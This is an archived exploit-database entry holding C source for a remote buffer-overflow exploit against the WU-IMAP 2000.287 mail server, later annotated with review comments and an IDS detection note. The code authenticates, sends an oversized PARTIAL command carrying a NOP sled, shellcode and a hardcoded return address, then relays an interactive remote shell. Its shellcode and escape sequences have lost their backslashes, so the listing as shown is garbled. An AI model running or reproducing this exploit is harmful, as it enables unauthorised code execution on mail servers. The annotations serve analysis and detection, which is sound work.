
# Title : WU-IMAP 2000.287(1-2) Remote Exploit
# Published : 2002-06-25
# Author : Teso
# Previous Title : Solaris 8 dtspcd Heap Overflow
# Next Title : SSH (x2) Remote Root Exploit


/* 7350owex- x86/linux WU-IMAP 2000.287(1-2) remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2002
* All Rights Reserved
*
*****************************************************************************
* bug found by scut 2002/06/25
* thanks to halvar,scut,typo,random,edi,xdr.
* special thanks to security.is.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0x080eb395 /* My Debian 2.2 box */
#define MAILDIR "/var/spool/mail"

/*
 * Payload bytes that main() copies into the request buffer (exactly 100
 * bytes, see the memcpy there); the array itself is never otherwise read.
 *
 * NOTE(review): the literal as reproduced here reads "x55x89..." rather than
 * "\x55\x89..." — the escape backslashes appear to have been lost when the
 * listing was copied, so as written this is plain ASCII text rather than the
 * byte values the author intended. Confirm against the original source.
 */
char shellcode[] =
 "x55x89xe5x55x89xe5x83xecx28xc6x45xd8x2fxc6x45xdc"
 "x2fxc6x45xd9x5fxc6x45xdax5axc6x45xdbx5fxc6x45xdd"
 "x5fxc6x45xdex5fx83x45xd9x03x83x45xdax0fx83x45xdb"
 "x0fx83x45xddx14x83x45xdex09x31xc0x89x45xdfx89x45"
 "xf4x8dx45xd8x89x45xf0x83xecx04x8dx45xf0x31xd2x89"
 "xd3x89xc1x8bx45xf0x89xc3x31xc0x83xc0x0bxcdx80x31"
 "xc0x40xcdx80";

/*
 * Program entry point. Expects exactly three arguments — <Target ip>
 * <Login> <Password> — and otherwise prints usage and exits with -1.
 *
 * Flow, as the code below shows: connect to TCP/143 on the target, send an
 * IMAP LOGIN with the supplied credentials, SELECT MAILDIR/<login>, send one
 * PARTIAL command whose BODY[...] section argument is the 1052-byte buffer
 * assembled in this function, wait five seconds, then relay bytes between
 * the socket and the terminal until the peer closes the connection.
 *
 * NOTE(review): string literals in this listing contain a bare "n" where a
 * newline escape ("\n") would be expected (e.g. "%sn"); presumably the
 * backslashes were lost when the file was reproduced. The behaviour
 * described here assumes the original escapes — confirm against the source.
 *
 * Detection note: every command reuses the client tag "A0666", and the
 * PARTIAL command carries a BODY[] section argument of roughly 1 KB made up
 * mostly of 0x90 bytes. Neither occurs in normal IMAP client traffic, and
 * both are cheap to match in server logs or an IDS signature.
 */
int main(int argc, char *argv[])
{
	int s, i;                          /* socket fd; loop index / byte count */
	fd_set fds;                        /* read set for the relay loop */
	char tmp[2048], buf[1060];         /* tmp: wire I/O scratch; buf: PARTIAL argument */
	char *target, *login, *pass, *p;
	struct sockaddr_in sock;           /* NOTE(review): never zeroed, sin_zero stays uninitialised */
	unsigned long retaddr;

	fprintf(stderr, "%sn", "7350owex by scut and zippo!");   /* banner to stderr, keeping stdout clean */
	if (argc != 4)
	{
		fprintf(stderr, "Usage: %s <Target ip> <Login> <Password>n", argv[0]);
		exit(-1);
	}

	retaddr = RETADDR;   /* fixed value from the #define above; there is no override option */
	target  = argv[1];
	login   = argv[2];
	pass    = argv[3];

	/* NOTE(review): neither socket() nor inet_addr() is checked; a failed
	 * socket() or an unparsable address (INADDR_NONE) only surfaces as a
	 * connect() failure below. */
	s = socket(AF_INET, SOCK_STREAM, 0);
	sock.sin_port = htons(143);
	sock.sin_family = AF_INET;
	sock.sin_addr.s_addr = inet_addr(target);

	printf("nConnecting to %s:143...", target);
	fflush(stdout);
	if ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)
	{
		printf("failedn");
		exit(-1);
	}
	else
		recv(s, tmp, sizeof(tmp), 0);   /* read and discard the server greeting */

	printf("donenLogging in...");
	fflush(stdout);
	snprintf(tmp, sizeof(tmp), "A0666 LOGIN %s %sn", login, pass);
	send(s, tmp, strlen(tmp), 0);
	recv(s, tmp, sizeof(tmp), 0);   /* reply overwrites tmp; its length is not recorded */

	/* NOTE(review): tmp is not NUL-terminated after recv() and the recv()
	 * result is unchecked, so strstr() may scan past the received bytes
	 * into whatever tmp held before (the greeting, or stack garbage). */
	if (!strstr(tmp, "completed"))
	{
		printf("failedn");
		exit(-1);
	}

	printf("donenExploiting...");
	fflush(stdout);

	dprintf(s, "A0666 SELECT %s/%sn", MAILDIR, login);   /* mailbox path is MAILDIR/<login> */

	/* Assemble the PARTIAL argument: 928 bytes of 0x90, then 100 bytes of
	 * shellcode[], then six 4-byte copies of retaddr — 1052 bytes in total,
	 * followed by the NUL left by the memset so buf can go through %s. */
	memset(buf, 0x0, sizeof(buf));
	p = buf;
	memset(p, 0x90, 928);
	p += 928;
	memcpy(p, shellcode, 100);
	p += 100;

	for (i=0; i<6; i++)
	{
		/* copies 4 bytes of retaddr in host byte order regardless of
		 * sizeof(unsigned long); on an LP64 little-endian host that is
		 * the low-order 4 bytes */
		memcpy(p, &retaddr, 0x4);
		p += 0x4;
	}

	snprintf(tmp, sizeof(tmp), "A0666 PARTIAL 1 BODY[%s] 1 1n", buf);
	send(s, tmp, strlen(tmp), 0);
	dprintf(s, "A0666 LOGOUTn");
	sleep(5);   /* fixed wait; nothing is read from the socket during it */
	printf("donenn");

	read(s, tmp, sizeof(tmp));   /* result ignored; drains whatever the server sent meanwhile */
	dprintf(s, "uname -a;id;n");   /* plain text written to the socket; any reply shows up in the relay loop */
	memset(tmp, 0x0, sizeof(tmp));

	/* Relay loop: bytes arriving on the socket go to the terminal and
	 * bytes typed on the terminal go to the socket, until recv() reports
	 * the connection closed. */
	while (1)
	{
		FD_ZERO(&fds);
		FD_SET(s, &fds);
		FD_SET(1, &fds);   /* NOTE(review): fd 1 (stdout) is selected for *reading*; works only because it is the same tty as stdin */

		select((s+1), &fds, 0, 0, 0);   /* return value unchecked; an EINTR falls straight through */

		if (FD_ISSET(s, &fds))
		{
			if ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)
			{
				fprintf(stderr, "Connection closedn");
				exit(0);
			}
			write(0, tmp, i);   /* NOTE(review): written to fd 0 (stdin), not stdout — same shared-tty caveat as above */
		}
		if (FD_ISSET(1, &fds))
		{
			i = read(1, tmp, sizeof(tmp));   /* NOTE(review): a -1 result is passed to send() unchecked, converting to a huge size_t */
			send(s, tmp, i, 0);
		}
	}

	return;   /* NOTE(review): bare return in a function declared int; unreachable after while(1) in any case */
}


